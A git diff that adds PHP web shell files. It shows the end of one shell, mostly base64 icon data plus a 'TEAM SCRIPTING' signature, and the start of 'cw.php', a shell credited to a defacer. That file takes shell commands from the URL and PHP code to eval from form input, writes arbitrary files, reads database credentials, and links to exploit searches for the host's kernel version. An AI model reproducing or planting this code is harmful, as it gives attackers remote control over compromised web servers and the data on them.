+"rKgLBQyZAiG+rh8tDKJyCc3OEQUdHQx81Xs/QQA7",
+"ext_rmi"=>
+"R0lGODlhFAAUAKL/AAAAAH8Af//4/8DAwL+/v39/fwAAAAAAACH5BAEAAAMALAAAAAAUABQAQANS".
+"OLrcvkXIMKUg4BXCu8eaJV5C8QxRQAmqBTpFLM+nEk3qemUwXkmvxs3n4tWOyCRk5DKdhi0JYGpk".
+"QFm6oNWyylaXud8uxI2Oe8zig8puf5WNBAA7",
+"ext_rtf"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
+"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
+"ext_shtm"=>
+"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAIdjI+pq+DAEIzpTXputLi9rmGc".
+"ETbgR3aZmrIlVgAAOw==",
+"ext_shtml"=>
+"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAIdjI+pq+DAEIzpTXputLi9rmGc".
+"ETbgR3aZmrIlVgAAOw==",
+"ext_so"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6".
+"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ".
+"AAA7",
+"ext_stl"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAgwAAAP///wCAAMDAwAAAgP//AICAgICAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARYEIlJK0VYmDE294YAZEMQFCZ6DiJpBsNRmuwoDephHGqd".
+"GanYLBCyCYavYOsWIDQJUKePeXr1lprmM1ooklRJGrbkjEJhY7B6qvlwOh+sZb5EAO74PB4RAQA7",
+"ext_swf"=>
+"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O".
+"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
+"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA".
+"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC".
+"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=",
+"ext_sys"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAgv///wAAAICAgMDAwICAAP//AAAAAAAAAANJ".
+"aLLc9lCASecQ8MlKB8ARRwVkEIqdqU0EEXCDqkxB4VZxSBTB8lqyTSD2+eVWE0lP8DrORgMiwLkZ".
+"/aZBVOqkpUa/4KisRC6rEgA7",
+"ext_tar"=>
+"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC".
+"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF".
+"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD".
+"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p".
+"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg".
+"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd".
+"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB".
+"u4tLAgEAOw==",
+"ext_theme"=>
+"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAAD/AAAA/wCAAAAA".
+"gAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".
+"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
+"FxEAOw==",
+"ext_txt"=>
+"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".
+"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".
+"UpPWG3Ig6Hq/XmRjuZwkAAA7",
+"ext_url"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg4CAgAAAAMDAwP///wAA/wAAgACAAAD/AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARdEMk5gQU0IyuOMUV1XYf3ESEgrCwQnGgQAENdjwCBFjO7".
+"Xj9AaYbjFArBme1mKeiQLpWvqdMJosXB1akKbGxSzvXqVXEGNKDAuyGq0NqriyJTW2QaRP3Ozktk".
+"fRQRADs=",
+"ext_vbe"=>
+"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMAAAP8AAAAAAAAAAAADRii63CEgxibH".
+"kwDWEK3OACF6nDdhngWYoEgEMLde4IbS7SjPX93JrIwiIJrxTqTfERJUHTODgSAQ3QVjsZsgyu16".
+"seAwLAEAOw==",
+"ext_vbs"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAICAgMDAwAD//wCAgAAAAAAAAAAAAANQ".
+"GLrcECXGJsWTJYyybbTQVBAkCBSgyKGPl2YjCcwnG2qrV13TQBI6GwbXqb0yCgCJJYSZOK4LZPDY".
+"DHSvgEAQAGxrzQKNhgFtz+j0eM2eJQAAOw==",
+"ext_vcf"=>
+"R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwICAAP//AAAA/4CAgIAAAAAAgP//".
+"//8AAAAAAAAAAAAAAAAAAAAAAAAAAARYUElAK5VY2X0xp0LRTVYQAMWZaZWJAMJImiYVhEVmu7W4".
+"srfeSUAUeFI10GBJ1JhEHcEgNiidDIaEQjqtAgiEjQFQXcK+4HS4DPKADwey3PjzSGH1VTsTAQA7",
+"ext_wav"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".
+"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".
+"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
+"ext_wma"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".
+"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".
+"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
+"ext_wmf"=>
+"R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwP///4CAgIAAAICAAP//AP8AAAAA".
+"gAAA/wAAAAAAAAAAAAAAAAAAAAAAAARgUKlBqx0yDyEACBxHZRMXDGC4YQOwCVQKdJ7bggcBtl8Q".
+"AJNfIBcoGD4CH1CBSAByxp5pOUAgCFFf6HexIKeore+2BaJ8p1sqaU6NpdOgiQJny5On+u+e7qH3".
+"EzWCgwARADs=",
+"ext_wri"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
+"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
+"ext_xml"=>
+"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".
+"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
+"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
+"IQA7",
+"ext_xsl"=>
+"R0lGODlhEAAQAEQAACH5BAEAABIALAAAAAAQABAAhAAAAPHx8f///4aGhoCAAP//ADNmmabK8AAA".
+"gAAAmQCAgDP//zNm/zOZ/8DAwDOZAAAA/zPM/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAV3oDSMZDlKqBgIa8sKzpAOr9s6gqzWPOADItZhpVAwhCvgIHBICBSCRQMh".
+"SAyVTZZiEXkgVlYl08loPCBUa0ApIBBWiDhSAHQXfLZavcAnABQGgYFJBHwDAAV+eWt2AAOJAIKD".
+"dBKFfQABi0AAfoeZPEkSP6OkPyEAOw==",
+"1"=>
+"R0lGODlhGAASAPZKAAICAgISCgI6EgJqFj6aIkyiJhqWIg6WIgJ6GkKeIk6mJgJSFgJOFAIyEgJe".
+"FjaKHkKSHkKOHgI+EiJyGjqCGjaCGj6KImKqQmauSgJGEipyFip2Gi52GgJWFgIqDjZ+HiJ+LgJW".
+"GgJKEhBQGSZuHiJuFiJqFgImDlrOQiJuGiZ2HAJaFyaCHDKSHi5+GhJmFh5iFxpiFl6iQhp6Li6O".
+"HkLCKjqqJjKCGhZuFhpaFhZaFgJeGjaqJj6yJjJ+Gi56GgJSEgJmGhZOFiJaGiZmIi52KkKKNlKe".
+"PmKySnLGUnrWWip6GjaaIjKOHgJyGgIWCgoeCgIuDgJiFh5yFhJaFg5qFgp2GgqCHgJmHgJuGiZy".
+"FiJmFiKCHiaOHg5OElqaQiqGLgJ2GipyGiZqGiJmGip+HiqOIi6WJhImFgJ+HhiCGiJ6GiJqGh5m".
+"GiJ2GiaKHgImCkKONh52GhZyFhZ2GhZ+GhaGHlaWQmKmRl6iRgIiCwIeCgIaCgI2EgAAAAAAACwA".
+"AAAAGAASAAAH/4AAAQIDBAUGAYiKiYwHjQGDCAkKBQsBlpiXmpkMAQ0ODxAREKSlpqemEhMUFa2u".
+"rhYXGLO0tRkaGxwdHhm5uR8YICELGcUZIiIMDCMkJSYnKB4lJSkqGB0iKywtLi/FycswMTELJxkw".
+"6DIzDCs0NTY3GzgZDAsdIzk5Ojr5/Rg7DFTw6OHjBwcNIoA4CDJCyBAiRYwcQZJECYYVC5YwafLD".
+"4AaFA5yMeALlRBQJIjpIGfBvxZQbBTds0EClipUrIwJE0RnAA6QAGLBIyaKFg68tMCZw6ZLTSwAR".
+"ATL8/AImS5gJYjaIGUOGRBkzZ3L+HBsADYY0atakYNOGDBs3LEfemMm5c6dPOJDMxuEiB4ffOXTq".
+"qLHT9GnUwxLK3sGAJ4/jPHhoiSVLufJPujzvBsCLV08Az3sC8BEdoDBUqVITJ+7jqbXmQAA7",
+"2"=>
+"R0lGODlhPwASAOUDAFmwLFGkJUKQHmauSgBNEgBOEgBYFgBXFgBlGQBkGQByGgBxGgBzGgqAHQCB".
+"HQ2BHQqCHRCCHSWNHySOHyWPICePICuXJSyWJSmXJSmPICeQISaPIBaFHQAQCgAZCgAXCgAWCgAU".
+"CgASCgAlCgAhCgAfCgAbCgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAAPwASAAAG40CAcEgsGo/IpBIZ".
+"aDqf0Kh0Sq1OBdisdsvter9g72BMLpvP6LR6nS643/C4fE6v2+/4vH4vNxz+B35/BoSCgYWAh4SJ".
+"iIqLgYyJkokIlZaXmJmam5ydmwqgoaKjpKWmp6imEA4QrayrrbGys6+ztreuuLMPEBESv8DBwsPE".
+"xcbHwxobFhfNF8zPztHT09DN0NbZ0tbU0s7QGeHhGuLi5OXo6eYa5+ru7xkbHPP09fb3+Pn6+/ls".
+"/v8A/4kYSLCgwYMIEypcmNCDCBAPIzKcSLGiwREiSIgoIcKhQ4gQLYocKSIIADs=",
+"3"=>
+"R0lGODlhBgASAOUDAFmwLFGkJUKQHmauSmGoQz2IIDeCGwBUFwBZGiB/LjR+Hyt2GQBOEgBPFABV".
+"Fyl0HgBXFgBYFwBbFwBjGTCEMFmiQQBmFwBpFwBtGQBzGhKCIGWtSgB2GwB6HQB/HQCCHRuIHwCE".
+"HRCGHRKJHRKLHR2PICWPICSPIC2XJCyWJSmXJCmWJCmaJUOMO1iYQimPICyPIhImFB+IHySOIUGK".
+"OAAQCliXQgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAABgASAAAGSkCAcBgoGgXI5GBA".
+"KBgMEERioFgwGA3I4AGRSCaUiuWCyWgGnI7nAxqERKNRaTAz2VGDFEvfcsH+MAMxMjM0gjVLNjE1".
+"jI2Oj49BADs=",
+"4"=>
+"R0lGODlhQgASANQJAFmwLFGkJUKQHjeCGyt2GSFsFx1gFhtZFIrdY4zdZIndYobdYoPdYILdX4Dd".
+"X3/dXgBvGQBuGQBwGQAQCgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAA".
+"QgASAAAFlSAgjmRpnmiqrkHrvnAsz3RtC3iu73zv/8DgYEgsGo/IpHLJJDif0Kh0Sq1ar4Wsdsvt".
+"er/gsNhALpvP6LR6zW4f3vC4fE6v2+94hB6R6Pv/fnoJeguFhgiFDIqKDY2OjQ+GC3uCgJYRmJma".
+"m5ydnpgSn6KeE6Wmp6ipqqusra6vsLGys7S1tre4ubq7vL2+v8DBwsMhADs=",
+"5"=>
+"R0lGODlhIQASAPYtAFmwLBqWIAASCg2VIEugJD6YIABqFwA6EAAAAFGkJQBSFABOFE2iJE6lJUKd".
+"IgB5G0KQHkGPHTaJHQBdFgAzEDeCGzuBGiBxGQA+ECt2GQAtDQBFEi53GSpwFyFsFwAnDVrNQgAq".
+"DSFqFyVsFxBQGR5hFhtgFhtZFBdZFIDdX3/dXobdYondYozdZInaYofYYYPTXn3MW3jEV3G6UWix".
+"TF+lRVWYP0qLODx7LjNvKShhIRlYHRJQFxRKFA1GEgBuGQBlFwBaFABUFAAzDQ0dCgoZCgoWCgAW".
+"CgAaCgAeCgAiCgAlCgA3EABKEg1OEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwA".
+"AAAAIQASAAAH/4AAgoOCAQKGiIeKA4sCAAQFBgcCCAmWl5YKApqcm56dCwIJDA0OD5MQqaqrrK2u".
+"ERASExQVtba3uLm6tRYXGBnAwcLDxMMKGhscGR0bHs7P0NHS0R8gISIeIyQl3N3e3+DfCh8bJtwk".
+"J+nq6+zt7ijwJiQpKSor9yss+votLSwuL2DEkDGDRg0bN3Dk0LGDRw8fJH5InEixokQDQCYEEbJg".
+"A4YhGj4QKWJEAAkBAo6kXIlEQMuWSQQokSlgSc2bIQRo0GnypYCYM23azElBQFEmAjAkFbCBqYAm".
+"ApyYREm1qtWrWK2eXKlSpU+YNIPeHMpzJwmfQMcKIGpUAFKlSiObNoUqdWvWu3ipbu3K0qXftGKF".
+"ri3b8y9NwWyPLo3rlK7JQAA7",
+"font"=>
+"/9j/4AAQSkZJRgABAgAAZABkAAD/7AARRHVja3kAAQAEAAAACgAA/+4ADkFkb2JlAGTAAAAAAf/b".
+"AIQAFBAQGRIZJxcXJzImHyYyLiYmJiYuPjU1NTU1PkRBQUFBQUFERERERERERERERERERERERERE".
+"RERERERERERERAEVGRkgHCAmGBgmNiYgJjZENisrNkREREI1QkRERERERERERERERERERERERERE".
+"RERERERERERERERERERERERE/8AAEQgAlACUAwEiAAIRAQMRAf/EAHAAAAMBAQEAAAAAAAAAAAAA".
+"AAACAwEEBgEBAAAAAAAAAAAAAAAAAAAAABAAAQMDAwMCBQIFBAMAAAAAAQAR4iGhAjESA0FhcVEi".
+"8IGxwRPhwvFSgvIE0TJCYnKSohEBAAAAAAAAAAAAAAAAAAAAAP/aAAwDAQACEQMRAD8A85yO+rfO".
+"SMMvTp3kjIkmvyrJPjk3WnmSCZyJLuPj+pM2QZ+veSTLlr28yVMeQkit5IMz4wA4y+P/AGUiW63k".
+"unPMnWnx/wCS5ssvT6yQU489oZ9e8kFvW8k/DmG/WSjvO7W8kDbiOr/OSMcq0+slu7veSwcvobyQ".
+"Bc6m8kbm63kjLItreSmM263kguSRi7hvMlIE7daeZLTyk47fvJZv9rPeSB+PlFHN5JuUhwxvJQxI".
+"epvJVJALfeSBcvR7yWYgkt95KmTNreSXHLIGhf5yQY3Tr5khbuL9/MkIH5eQO7v85KQzJ63ktJ9r".
+"veSUZt1vJBmRY1N5JvyBh27ySnJ6veSelK3kgtnlUg0Px3UTlVwbyVTlj0L/AB5UX73kgph7tcm+".
+"clI5B6GnmSfAEuX7ayUiWOt5IH30d7yWYZN1vJLuej3kqYgnreSBs83x1vJSf1N5J26veSXI97yQ".
+"dGO3Z8vWSRxs1r5kjEPjreSwYvjue8kExUO95LTyHqbyW8ebGpvJNzZuQxvJAm/veSrxkvreSgcj".
+"63kqcRJOtPMkGv7nfr6yQt7PeSEGZ5FyD9ZJMcvU3kqZkklzeSHp7vrJBPLIPreSCSCK3kinQ3km".
+"3gsB9ZIH5c2AANR/2/UKb97yVs8AA73ko5HveSCmPLtDfeSi7nW8lTHHdiwNX9ZKbt1f5yQGXq95".
+"KoY1fp6yU3y9byVMX13afH8yBeTJgz3ksGYNHvJGWXTL6yWBh1vJBYPtcZfJ5KR5CcWGnmSc8hAH".
+"j1kp45tT7yQbhkOpp5kmzOIIA+slmIchzeSblYEMbyQKW9byTY57TreSzIhqGvmSkSfW8kFvyV1v".
+"JCVy2tfMkIN5OYE0L/OS0ZuKG8knKQDT6yT8eQABe8kGFuv1knOeIY4mvmShnybsne8lXEilbyQY".
+"f8g5UJp5kkOXe8lbkxxxLg9fWSm/e8kG8eJy6t61ksdtDeSpxAkODr3koZ51Z9O8kGnkagN5Jxyg".
+"9byUX73kqOB1vJBQl8XBr5kpO3W8lhyOr3kmJ7695IN3ECj+XkgY+13vJWxzGxn6eslHcW1p5kg3".
+"HIir3ksy5zkdbyWDKoreSCADQv8AOSBssgRrXzJKC9HvJYToXvJNjlV3vJAbqs9fMkJfy+7W8kIN".
+"5BtLPeSMPN5Izy9TXzJbg563kgnka0N5LRmSQHvJNl7Sz3kkGTHW8kHTy4ZYiuT/ADkucEvreSuf".
+"8jeGP1kkOVdbyQU4ssgA1X7yXPmfca3kuri5RjiQTV/WS5+TJ8nBp5kgmS3W8loJPW8kwyB63kmx".
+"yGNXvJApyo33kjfUVvJWzO7HdoK/GqiD3vJAEFv1kgZ0b7yXTjyDYzjT1kpbwBrXzJACoYm8kcjY".
+"ZMDeSOM7tTTzJbyjHEit5IJ5Gmt5JsMhiam8kZZgdbySb3qDeSBt2O93p5khJ11vJCB8uQEu95IH".
+"K1B9ZIzGzrTzJKM2IL3kgw51qbyTZ9jeSCXOtPMlmWTChvJBozb+MkmRrreSbHkHU3kseut5IOr/".
+"AByAKm8lLMsSQbyWYEHreSUcrn9ZIDcDqW+ck4yx9byWbu95Jg3reSDCCQ708ySu3W8lXPNsaGnm".
+"S5xyepvJBfHEbO/mSk3td7yTa47hleSXHIka08yQHGcnobyW8m5wcjeSbHMBq3kt5Mjk3T5yQSyJ".
+"P8ZJ8GBd7yQdNbyWYgks7jzJAbxud7yQl9rs95IQPyA0BN5KenW8lXk5NzMdKayUhm9AbyQBypre".
+"Sw5uNbyWkt1vJA7m8kGP3vJG7veSYZd6eZIJrreSBRkRV7yRjlXW8lXjALv9ZJMvaTWg7yQZln0e".
+"8lozINTeSXd3vJM/w8kD5Znb+slHd3vJdBOO0jQ+ZKIHqbyQaOUtte8kwy9rPeSMdur18yT45A4d".
+"/MkGcf8AM/X1kn5+bEttN5KfQl6eZJMyKAGnmSDTyd7yW4cjn9ZJMqdbyTcZ73kg1qt18yQm/IHd".
+"7yQgzLIavr3kkNKg3km5CMdDeSXHMk63kgN/V7yTFmBB17ySZmut5IORYVvJA+BHU3kkyzrreSMM".
+"u95Jz8VkgfibIO95JMg2RreSfiJqx07yU8+Ri5NfMkAcgOt5KgzB0N5Ln3P1vJbubreSDpzwYO95".
+"KDtV7yTfnLN95LH7695IKBzj/up5kkFA73knx5iAB95JTmWp9ZIDfqH17yUn73krAghnr5kt5Msc".
+"urHzJBHcepvJNhk51vJaR3vJGPIMTreSAY7tr3khDl9z18yQgzIsKm8kmJcs95J+XMZMxvJLiSC7".
+"3kgCW63ktOb0+8kHNyS95LciWDG8kGA97yWDMuz3kgZd7yT6dbyQNhltBL08yU+XJ8nfXvJUxzAB".
+"B+slPkz3VfXvJAm7veSbd3vJYC/W8k7j1vJBhyG3WvmS05UFbyQzhwbyWP0e8kFN4Ad3PnT/AOkn".
+"5faz3kr45DbqNPWSmcBt3PeSDOPIUreStysQP9ZLlxJ9aeZKuZ29aeZIDIBtbyS7gOt5JDmT1vJO".
+"MgRreSBfy/DyQl6s95IQV5d1H/clG743IQgT3dP3Kvu+NyEIEx3fG5GX5H/uQhA2O7/l+5FXpp/U".
+"hCBMn6fuW4bvjchCBzvamn9SQbuv7kIQWDtRnb/son8jV0/qQhBuO7b/AHIz/J1/chCBDu+Ny3Dc".
+"/wDchCA97/3IQhB//9k=",
+"pdisk"=>
+"R0lGODlhEQAMAOZkAODg34mJicfHx4GBguHh4WxsbObm5dDQ0H5+fnl5eYKCgv3+//Ly8t/f3svK".
+"yqKios/PzsDAwKempktKS87NzaCgoE5OTnFyco2NjLu7u1JRVvf4+Pv+/4CAgMHAv9LS0mVldFdX".
+"V0VFSsTDw7i4uXZ2dqSjpKWkpNzb24uLkMzM3efn5uzr60NDRoSEjmhnZ6usq+Tk49HR0HJyco6O".
+"jlNTW3Z2hNjY2MHBwfHw8Dw8P9XV1KOjpNnZ2MvLytzc24mJjXh4ipeXl2JjY5STk25vdYqKiamp".
+"qV1dXunp7Gxsa52cnHl5fZiYtrq6u9TU1ExMTq+vrvb3+FNTU+7t7srJyTQ0NO3s7Ozs63t8fE5N".
+"Urq5unBwdZqamujn54CAktbV1X18fbW1tdTU0wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5".
+"BAEAAGQALAAAAAARAAwAAAeLgGSCg4SFhoeIZCwoAmArFDtPC4UxABkJBSQMC1cAGw44PoNOYw0C".
+"BAAMHFgNUkkqKUBeZBVLYqcGBzcfI11MLV82CGQSUUIKJlsyNJgDQ1ZNQUpkOQEBVTwdCmEWFwhF".
+"IBpTWYMeAyUYJ1w6IjVQITNHP4RUEEQvLloTSAERBok9YBh5cCCRQUKBAAA7",
+"odel"=>
+"R0lGODlhEQAPAKIEAFQhHFQhG1MhG5QaHQAAAAAAAAAAAAAAACH5BAEAAAQALAAAAAARAA8AAAMq".
+"SLrc/jDKIZoYb+iqgsbOVwFf9JGaRHypilLqxQaRl4rPu+AhuPuqYDABADs="
+
+);
+$imgequals = array(
+"ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
+"ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml"),
+"ext_htaccess"=>array("ext_htaccess","ext_htpasswd")
+);
+ ksort($arrimg);
+ if (!$getall)
+ {
+  header("Content-type: image/gif");
+  header("Cache-control: public");
+  header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+  header("Cache-control: max-age=".(60*60*24*7));
+  header("Last-Modified: ".date("r",filemtime(__FILE__)));
+  foreach($imgequals as $k=>$v)
+  {
+if (in_array($img,$v)) {$img = $k;}
+  }
+  if (empty($arrimg[$img])) {$img = "small_unk";}
+  if (in_array($img,$ext_tar)) {$img = "ext_tar";}
+  echo base64_decode($arrimg[$img]);
+ }
+ else
+ {
+  echo  "<center>";
+  $k = array_keys($arrimg);
+  foreach ($k as $u)
+  {
+echo $u.":<img src=\"".$sul."act=img&img=".$u."\" border=\"1\"><br>";
+  }
+  echo "</center>";
+ }
+ exit;
+}
+if ($act == "about")
+{
+ $dàta = "Any stupid copyrights and copylefts";
+ echo $data;
+}
+
+$microtime = round(getmicrotime()-$starttime,4);
+
+?>
+<? // [CT] TEAM SCRIPTING - RODNOC ?>
\ No newline at end of file
diff --git a/php/cw.php b/php/cw.php
new file mode 100644
index 0000000..1b9949b
--- /dev/null
+++ b/php/cw.php
@@ -0,0 +1,766 @@
+<?php
+
+# Edited By KingDefacer
+
+// Variables
+   $info = @$_SERVER['SERVER_SOFTWARE'];
+   $page = @$_SERVER['SCRIPT_NAME'];
+   $site = getenv("HTTP_HOST");
+   $uname = php_uname();
+   $smod = ini_get('safe_mode');
+           if ($smod == 0) { $safemode = "<font color='lightgreen'>KAPALI</font>"; }
+           else { $safemode = "<font color='red'>ACIK</font>";      }
+   $dir = @realpath($_POST['dir']);
+   $mkdir = @$_POST['makedir'];
+   $mydir = @$_POST['deletedir'];
+   $cmd = @$_GET['cmd'];
+   $host = @$_POST['host'];
+   $proto = @$_POST['protocol'];
+   $delete = @$_POST['delete'];
+   $phpeval = @$_POST['php_eval'];
+   $db = @$_POST['db'];
+   $query = @$_POST['query'];
+   $user = @$_POST['user'];
+   $pass = @$_POST['passd'];
+   $myports = array("21","22","23","25","59","80","113","135","445","1025","5000","5900","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
+   
+
+   $quotes = get_magic_quotes_gpc();
+if ($quotes == "1" or $quotes == "on")
+   {
+       $quot = "<font color='red'>ACIK</font>";
+   }
+   else
+   {
+       $quot = "<font color='lightgreen'>KAPALI</font>";
+   }
+   // Perms
+    function getperms($fn)
+{
+$mode=fileperms($fn);
+$perms='';
+$perms .= ($mode & 00400) ? 'r' : '-';
+$perms .= ($mode & 00200) ? 'w' : '-';
+$perms .= ($mode & 00100) ? 'x' : '-';
+$perms .= ($mode & 00040) ? 'r' : '-';
+$perms .= ($mode & 00020) ? 'w' : '-';
+$perms .= ($mode & 00010) ? 'x' : '-';
+$perms .= ($mode & 00004) ? 'r' : '-';
+$perms .= ($mode & 00002) ? 'w' : '-';
+$perms .= ($mode & 00001) ? 'x' : '-';
+return $perms;
+}
+ // milw0rm Search (locushell)
+ 
+$Lversion = @php_uname('r');
+$OSV = @php_uname('s');
+if(eregi('Linux',$OSV))
+{
+$Lversion=substr($Lversion,0,6);
+$millink="http://milw0rm.com/search.php?dong=Linux Kernel".$Lversion;
+
+}else{
+$Lversion=substr($Lversion,0,3);
+$millink="http://milw0rm.com/search.php?dong=".$OSV." ".$Lversion;
+}
+if(isset($_POST['milw0'])) { echo "<script>window.location='".$millink."'</script>"; }
+   //Space
+   $spacedir = @getcwd();
+   $free = @diskfreespace($spacedir);
+   
+if (!$free) {$free = 0;}
+   $all = @disk_total_space($spacedir);
+if (!$all) {$all = 0;}
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+$percentfree = intval(($free*100)/$all);
+
+
+// PHPinfo
+if(isset($_POST['phpinfo']))
+{
+die(phpinfo());
+}
+   
+
+// Make File
+
+   $name = htmlspecialchars(@$_POST['names']);
+   $src = @$_POST['source'];
+    if(isset($name) && isset($src))
+      {
+	  if($_POST['darezz'] != realpath("."))  { $name = $_POST['darezz'].$name; } 
